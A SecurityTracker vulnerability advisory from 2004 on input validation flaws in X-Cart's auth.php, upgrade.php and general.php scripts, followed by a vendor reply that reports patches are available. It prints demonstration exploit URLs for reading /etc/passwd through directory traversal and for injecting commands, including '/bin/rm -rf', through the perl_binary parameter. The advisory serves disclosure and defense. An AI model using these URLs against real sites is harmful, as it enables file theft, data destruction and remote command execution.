(Vendor Issues Fix) X-Cart Input Validation Flaws Let Remote Users Execute Arbitrary Commands and View Files - SecurityTracker

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

Home | View Topics | Search | Contact Us |

SecurityTracker
Archives

Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Commerce) > X-Cart

Vendors: Qualiteam Corp.

(Vendor Issues Fix) X-Cart Input Validation Flaws Let Remote Users Execute Arbitrary Commands and View Files

SecurityTracker Alert ID: 1008964

SecurityTracker URL: http://securitytracker.com/id/1008964

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: Feb 6 2004

Impact: Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network

Fix Available: Yes Vendor Confirmed: Yes

Version(s): Vendor reports that various versions are affected

Description: A vulnerability was reported in the X-Cart shopping softwrae. A remote user can view files and execute arbitrary commands on the target system.

It is reported that the 'auth.php' script does not properly validate the user-supplied 'shop_closed_file' parameter. A remote user can supply a specially crafted URL containing '../' directory traversal characters to view files on the target system with the privileges of the web service. A demonstration exploit URL is provided:

http://[target]/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd

It is also reported that the 'upgrade.php' script does not validate the user-supplied 'perl_binary' variable. A remote user can supply a specially crafted URL to execute arbitrary operating system commands on the target system. The commands will run with the privileges of the web server.

Some demonstration exploit URLs are provided:

http://[target]/admin/upgrade.php?prepatch_errorcode=1&patch_files[0][orig_file]=VERSION&perl_binary=/bin/rm -rf &patch_exe=..

http://[target]/admin/general.php?mode=perlinfo&config[General][perl_binary]=/bin/ls -lR ||

It is also reported that a remote user can obtain potentially sensitive information about the target system with the following type of URLs:

http://[target]/admin/general.php?mode=phpinfo

http://[target]/admin/general.php?mode=perlinfo

Impact: A remote user can execute arbitrary commands on the target system with the privileges of the web service.

A remote user can view files on the system with the privileges of the web service.

A remote user can obtain potentially sensitive PHP and Perl configuration information.

Solution: The vendor reports that patches for the affected versions are available for download in the X-Cart members area.

Vendor URL: www.x-cart.com/ (Links to External Site)

Cause: Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Message History: This archive entry is a follow-up to the message listed below.

X-Cart Input Validation Flaws Let Remote Users Execute Arbitrary Commands and View Files

Source Message Contents

Date: 5 Feb 2004 06:33:17 -0000
Subject: Re: X-Cart vulnerability


In-Reply-To: <20040203091937.11695.qmail@www.securityfocus.com>

Vulnerabilities specified by Philip were partially confirmed for a limited number of versions.

Patches for affected versions are available for download in the X-Cart members area.

--
Dmitry Verbichenko
Creative Development

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
Copyright 2013, SecurityGlobal.net LLC